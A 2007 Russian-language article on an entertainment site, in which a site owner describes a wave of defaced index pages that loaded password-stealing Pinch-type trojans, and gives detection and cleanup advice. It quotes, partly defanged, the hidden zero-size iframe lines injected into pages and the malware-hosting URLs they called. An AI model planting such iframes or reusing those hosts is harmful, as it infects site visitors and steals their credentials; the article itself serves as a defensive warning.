Главная сайта | Форум | Фотоальбом | Регистрация   | Вход | Cайт в избранное | Правила сайта и форума

Приветствую Вас Гость | RSS


Фильмы | Онлайн Видео | Софт | Новости и Статьи | Игры онлайн | Фотоальбом | Форум

ДЛЯ ПРОСМОТРА САЙТА РЕКОМЕНДУЕТСЯ ИСПОЛЬЗОВАТЬ:  Uran - браузер от uCoz на базе проекта Chromium. | Google ChromeOpera | Firefox 


МЕНЮ САЙТА

ПОИСК ПО САЙТУ

Gamesblender 675: новый шутер от Valve, Stellar Blade на ПК и ускоренный ИИ на GeForce RTX

Gamesblender № 674: новые боссы PlayStation, опасная стратегия Microsoft и ассасины в Японии

Gamesblender № 673: внезапная Hades II, закрытие студий Bethesda и контроль видеоигр в России

Gamesblender № 661: будущее Xbox, новая игра авторов Ori, «неправильная» Subnautica 2 и прощание с Dead Cells

Gamesblender № 660: «портативки» от Sony и Microsoft, эксклюзивы Xbox на PlayStation, сделка Epic и Disney и показ Final Fantasy VII Rebirth

Tekken 8: 10 аниме из 10

Gamesblender № 659: Death Stranding 2 и другие показы State of Play, новый президент Blizzard, отмена Deus Ex и перенос «Смуты»

Gamesblender № 657: дата выхода S.T.A.L.K.E.R. 2, «Индиана Джонс» от авторов Wolfenstein, закрытие Piranha Bytes, Larian против подписок

Gamesblender № 656: ремастер Half-Life 2, сиквел Cyberpunk 2077 и новый конкурент Steam Deck

Gamesblender № 654: главные события 2023 года в игровой индустрии

Игромания! ИГРОВЫЕ НОВОСТИ, 7 мая (Red Dead Redemption 2, Beyond Good and Evil 2, Hotline Miami)

Игромания! Игровые новости, 16 января (Nintendo Switch, Scalebound, Diablo, League of Legends)

Как озвучивали Star Wars Battlefront

Игромания! ИГРОВЫЕ НОВОСТИ, 27 мая (PS VR, Playdate , CoD: MW, Roller Champions, Dead Island 2 )

Во что поиграть на этой неделе — 25 ноября (Amnesia Collection, Cyber Chicken, Blade & Bones)

Игромания! Игровые новости, 8 февраля (DOOM, Unreal Engine, Симулятор муравья)

Во что поиграть на этой неделе — 29 ноября + Лучшие скидки на игры

Игромания! Игровые новости, 22 мая (Ведьмак, Destiny 2, Life is Strange, Sega, GTA 5)
СТАТИСТИКА
Всего материалов:
Фильмомания: 1513
Видео: 220
Каталог файлов: 95
Каталог статей: 6797
Фотоальбом: 1236
Форум: 1152/8419
Каталог сайтов: 386

Всего зарегистрировано:
Зарегистрировано: 1724
Сегодня: 0
Вчера: 0
За неделю: 1
За месяц: 6

Из них:
Пользователи: 1649
Проверенные: 23
Друзья: 5
Редакторы: 0
Журналисты: 8
В вечном бане: 33
Модераторы: 1
Администраторы: 3

Из них:
Парней 1295
Девушек 427


ON-Line всего: 10
Гостей: 10
Пользователей: 0

Сейчас на сайте:


Кто был?
R_A_M_M_A_N, picturecollection, maikerufaragor, lime-line-design,
ВЫ МОЖЕТЕ ОКАЗАТЬ ПОДДЕРЖКУ ЗА ТРУДЫ, ПОЖЕРТВОВАВ ЛЮБУЮ СУММЫ.

WEBMONEY



Категории каталога

Главная » Статьи » Статьи » Статьи: Общие

Новый троян, похищающий пароли доступа

Новый троян, похищающий пароли доступа и не определяющийся антивирусными программами.
Как бороться с прокатившейся эпидемией изменения
индексных страниц сайтов?
 

Я не зря написал слово "эпидемия". Дело в том, что в конце 2006 - начале 2007 года владельцы сайтов столкнулись с неприятной ситуацией. При открытии индексной страницы сайта (хостинг значение не имеет, платный или бесплатный) на компьютер начинал подгружаться вирус-троян, который антивирусной программой не определялся.
Оказывается, в код страницы были внесены изменения - после завершающего кода конца страницы была добавлена ссылка на сайт-вирусоноситель, с которого собственно и загружался троянец.
Некоторые индексные страницы вообще "стирались", то есть, на них не оставалось ни одного тега, чисто тебе чистый лист бумаги :).
Соответственно прокатилась волна претензий и обвинений к хостерам, из-за "взлома" хостов пользователей. Явление приняло такие масштабы, что впору было обвинять именно хостеров в том, что они допустили похищение баз аккаунтов пользователей и теперь злоумышленники их используют.
Один такой случай, правда, был в прошлом году с valuehost.ru, когда была "утянута" целая база паролей с сервера (за достоверность не ручаюсь), но в теперешней ситуации винить хостеров в заражении индексных страниц несколько преждевременно.

Говорю это на основании собственного опыта, так как я сам убедился, что в один прекрасный день были дефейснуты (хакнуты) индексные страницы этого сайта и бесплатников на narod.ru и nm.ru. Причем, вход на фтп был выполнен с моим аккаунтом и паролем, то есть без брутфорса и подобных вещей.
 Суть вносимых изменений заключается в том, что на странице index.html (или index.php) после завершающего тега '/html' появляется следующий участок кода:
iframe src=http://pynet.ws/col/index.php width="0" height="0" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" и т.д.
Это может быть ссылка на http://www.counter-pr.info/sp_pack/counter/index.php, http://mz0i.info/gera/index.php или iframe src='http://ltds.biz/go.php?id=1781&user_name=sam' width=1 height=1 /iframe или другой сайт

Я намеренно убрал открывающие кавычки и гиперссылку, чтобы Вы не попались на эту ловушку :). Тег iframe, в который заключена ссылка, имеющий значение width="0" и height="0" говорит о том, что Вы не увидите открывающееся окно "левого" сайта, поскольку заданы нулевые координаты этого окна.
Сразу предвижу закономерный вопрос о лохизме и неиспользовании антивируса на компьютере :)) Так вот, антивирусом ДрВеб (DrWeb) лаборатории Данилова пользуюсь уже около 7 лет, претензий к нему не имел, обновляю постоянно. Плюс к этому на компьютере стоит Agnitum Outpost Firewall, который говорит свое веское слово в спорных случаях, типа "программа c:/windows/r.exe запрашивает исходящее соединение ..." и так далее. Таким способом, как я думал, мне удавалось иметь 100% уверенность в завтрашнем дне smile Оказалось, что все не так просто...

Анализ возможного заражения привел к парадоксальному результату. Индексные страницы менялись после того, как я проводил авторегистрацию сайтов в каталогах с помощью программы AllSubmitter. Сама программа, конечно, не виновата, просто в базе данных находились "зараженные" ссылки. Простая логика говорит о том, что в этой базе находится одна или несколько ссылок на сайты, с которых загружается вирус-троян.

Но проблема заключалась не только в паролях доступа к ftp. Кроме того была сделана попытка утянуть пароль на аську-семизначник, который удалось восстановить ретривом. Больше всего подходит под результаты ущерба Trojan типа Pinch, так как он умеет обходить файерволл и антивирусные программы, а "тырит" все, к чему может дотянуться, в том числе пароли, сохраненные в IE, CuteFTP (мой случай), Total Commander и еще десятке различных программ.
Исследование ссылки, которая дописывалась на индексную страницу моего сайта дали возможность предположить, что имеется в виду комплексная атака на компьютер. То есть:
Сначала загружается Trojan-Downloader.VBS. Psyme.fc - троянская программа-загрузчик других троянов. Именно она подгружает еще два вируса - Trojan-PSW.Win32.LdPinch.bik (или модификация) и Trojan.Win32.Agent.oh (не обязательно).

Самое интересное, что как ДрВеб, бывший на компьютере, так и впоследствии скачанный и установленный после него Антивирус KAV, определяли, что на компьютер закачивается троян и его ликвидировали. Вроде... На самом деле, это мог быть просто известный троян, который служил ширмой.
Еще один ньюанс: с самого начала загрузки файлов с зараженного сайта на рабочем столе мог создаваться и выполнялся файл new.exe (его копия могла создаваться в папке Temp и папке интернет-обозревателя - в моем случае Maxthon). В папке Виндовс появлялись файлы названиями r.exe или c.exe, которые антивирусом не опознавались как опасные.
По свидетельствам других пользователей в папке Windows мог создаваться поддельный файл с названием svchost.exe (оригинал находится в папке System32). Тогда в процессах операционной системы трудно определить, какой из процессов, используемых программой svchost.exe есть истинный, а какой поддельный.
Но! Существует одно "но" - трояны типа Pinch надежно отлавливаются как Доктор Веб, так и антивирусом Касперского. Вроде отлавливаются... Возможно предположение, что запущена или модификация этого вируса, которая успевает обойти антивирус, или работает другой вирус, который маскируется "Пинчем".
Как видим, прослеживается четкая тенденция - заражение индексной страницы, закачка на компьютер трояна-даунлоадера, закачка этим трояном одного или нескольких троянцев, которые похищают пароли, передача паролей злоумышленнику.

Такая передача может идти как через почтовый клиент (отправляется письмо на горячий мейл), так и через командную строку Internet Explorer (антивирусом не определяется). Вполне возможно, что троян мог использовать и имеющийся фтп-клиент для того, чтобы модифицировать индексную страницу. Вариантов здесь множество.
Одно замечание: в моем случае действие трояна можно было заметить по тому, что была запущена служба Telnet и удаленное управление рабочим столом, так же как и удаленный доступ к реестру. Можете проверить прямо сейчас, зайдите через "Панель управления/Администрирование" в список служб, и если они у Вас работают, отключите
Существовал еще один вариант, почему не определялся вирус, причем, достаточно вероятный. Используемая программа-троян могла принадлежать к руткитам (программам, внедряемым в ядро операционной системы), которые трудно обнаруживаются антивирусами. Или используется уязвимость Интернет Эксплорер версии 6 (Internet Explorer 6). Вот как о ней писалось: Удаленный пользователь может с помощью специально сформированной Web страницы загрузить на удаленную систему произвольный HTA файл и затем выполнить его с привилегиями пользователя, запустившего браузер. Удачная эксплуатация уязвимости позволит злоумышленнику выполнить произвольный код на целевой системе.
Спрашивается, что делать? Первое, проверьте свои сайты, если при открытии индексной страницы Ваш антивирус скажет, что выполняется или загружается троян, Вы заразились. Если даже и ничего не произойдет, просмотрите HTML-код, на предмет присутствия после тега '/html' внедренного тега 'iframe' с атрибутами "width="0" height="0" или width="1" height="1".
Если с Вами произошла эта неприятность, то как от нее избавиться читайте на странице:
Очистка операционной системы от вирусов, троянов и программ-шпионов

Так как поиск уязвимостей хакерами ориентирован на Internet Explorer, есть и компромиссный вариант: использовать альтернативный браузер, не базирующийся на платформе IE. Это Firefox (огненная лиса) на движке Mozilla. Ознакомиться с ним Вы можете по баннеру ниже:

Вы можете попробовать новый быстрый браузер Mozilla Firefox — это браузер, обладающий функцией блокировки всплывающих окон и просмотра страниц на вкладках, а также функциями безопасности и конфиденциальности. В браузер Firefox интегрирована панель инструментов Google, чтобы предоставить пользователям еще больше полезных функций: поиск в Google, проверку правописания и автозаполнение.
Установите и попробуйте - Вы не потеряете ничего. А вот если Mozilla Firefox оправдает Ваши ожидания, тогда забудете про все проблемы, связанные с осликом ИЕ.
Новую информацию об этой теме можете прочитать на странице

Если на странице вы заметили в посте отсутствие изображений, просьба сообщить , нажав на кнопку.



После прочтения материала " Новый троян, похищающий пароли доступа ", можно просмотреть форум и поискать темы по данной игре.



ДРУГИЕ МАТЕРИАЛЫ
Обнаружен первый троян для iPhone
Свежий ролик Resident Evil 5 из Германии
Warhammer Online: скрины и интервью
“Edelweiss”: шедевр моддерского искусства
Информация и скрины из первого превью шутера Rage
Новые иллюстрации Gothic 4
Прозрачный алюминий
Microsoft привела факты о Windows Vista
Windows 7. Современное руководство по развертыванию настольных систем
Официальный анонс Palit Radeon HD 4870 Sonic Dual Edition
В США продано 8,6 млн коробок с World of Warcraft
Пресс-релиз сборки Windows 11 Insider Preview Build 22468
USB 3.0 может быть представлен на летнем форуме IDF
Много новых иллюстраций Killzone 2
ВАНГА
Diablo 3 невозможно взломать
Как воспользоваться своей женской и сексуальной силой
Tropico 3 выходит на Xbox 360 и PC
Совет недели по групповым политикам 3 – Предопределение языковых стандартов
Самый тонкий в мире 22" монитор ASUS LS221H: кожа и стекло

Если вам понравился материал "Новый троян, похищающий пароли доступа", - поделитесь ним с другими.


html-cсылка на публикацию
BB-cсылка на публикацию
Прямая ссылка на публикацию


Категория: Статьи: Общие | Добавил: Фокусник (14.08.2007)
Просмотров: 4066

Ниже вы можете добавить комментарии к материалу " Новый троян, похищающий пароли доступа "

Внимание: Все ссылки и не относящиеся к теме комментарии будут удаляться. Для ссылок есть форум.


Всего комментариев : 0
avatar
ФОРМА ВХОДА
ПОЖЕРТВОВАНИЯ

WMZ: Z143317192317
WMB: X706980753649

Boosty - Donate

Payeer: P48650932
На кофе / ko-fi
ПАРТНЕРЫ

World of Warships — это free-to-play ММО-экшен, который позволяет окунуться в мир масштабных военно-морских баталий. Возьмите под управление легендарные боевые корабли первой половины ХХ века и завоюйте господство на бескрайних океанских просторах.

Курсы обмена WebMoney


Что такое ресурс Turbobit и как качать.


Получи 10 ГБ места бесплатно, на всю жизнь.


Boosty – сервис по сбору донатов.
Gamesblender № 266: Evolve стала бесплатной, Kickstarter измельчал, а No Man’s Sky больше не отложат
Gamesblender № 266: Evolve стала бесплатной, Kickstarter измельчал, а No Man’s Sky больше не отложат
Игровые Новости — The Elder Scrolls 6, Fallout 76, DOOM 2, Starfield, RAGE 2, Wolfenstein Youngblood
Игровые Новости — The Elder Scrolls 6, Fallout 76, DOOM 2, Starfield, RAGE 2, Wolfenstein Youngblood
22 крутых телефонных лайфхака, которые нельзя не попробовать
22 крутых телефонных лайфхака, которые нельзя не попробовать
Офисный беспредел — Русский трейлер (2018)
Офисный беспредел — Русский трейлер (2018)
Игромания! ИГРОВЫЕ НОВОСТИ, 27 марта (Cyberpunk 2077, Ubisoft, PUBG, Fortnite, TESO)
Игромания! ИГРОВЫЕ НОВОСТИ, 27 марта (Cyberpunk 2077, Ubisoft, PUBG, Fortnite, TESO)
Hellblade - создание мира
Hellblade - создание мира
Операция «Финал» — Русский трейлер (2018)
Операция «Финал» — Русский трейлер (2018)
Игромания! ИГРОВЫЕ НОВОСТИ, 4 июня (Assassin's Creed Odyssey, Fallout 76, Battlefield 5)
Игромания! ИГРОВЫЕ НОВОСТИ, 4 июня (Assassin's Creed Odyssey, Fallout 76, Battlefield 5)
Форсаж 9 [Обзор] / [Трейлер 2 на русском]
Форсаж 9 [Обзор] / [Трейлер 2 на русском]
Игрозор №202
Игрозор №202

Редкие старые фотографии знаменитостей из коллекции Morrison Hotel Gallery (34 фото)
Редкие старые фотографии знаменитостей из коллекции Morrison Hotel Gallery (34 фото)
Прикольные картинки и фото (24 шт)
Прикольные картинки и фото (24 шт)
Художник изобразил диснеевских персонажей в виде реальных людей (17 фото)
Художник изобразил диснеевских персонажей в виде реальных людей (17 фото)
Демотиваторы для хорошего настроения (19 шт)
Демотиваторы для хорошего настроения (19 шт)
26 человек, которым лучше пойти к другому парикмахеру
26 человек, которым лучше пойти к другому парикмахеру
23 женщины до и после преображения
23 женщины до и после преображения
Женщины до и после преображения (39 фото)
Женщины до и после преображения (39 фото)
Художник изобразил диснеевских персонажей в виде реальных людей (17 фото)
Художник изобразил диснеевских персонажей в виде реальных людей (17 фото)
СТАТИСТИКА
Яндекс.Метрика


Copyright © 2000-2024, Alex LTD and System PervertedХостинг от uCoz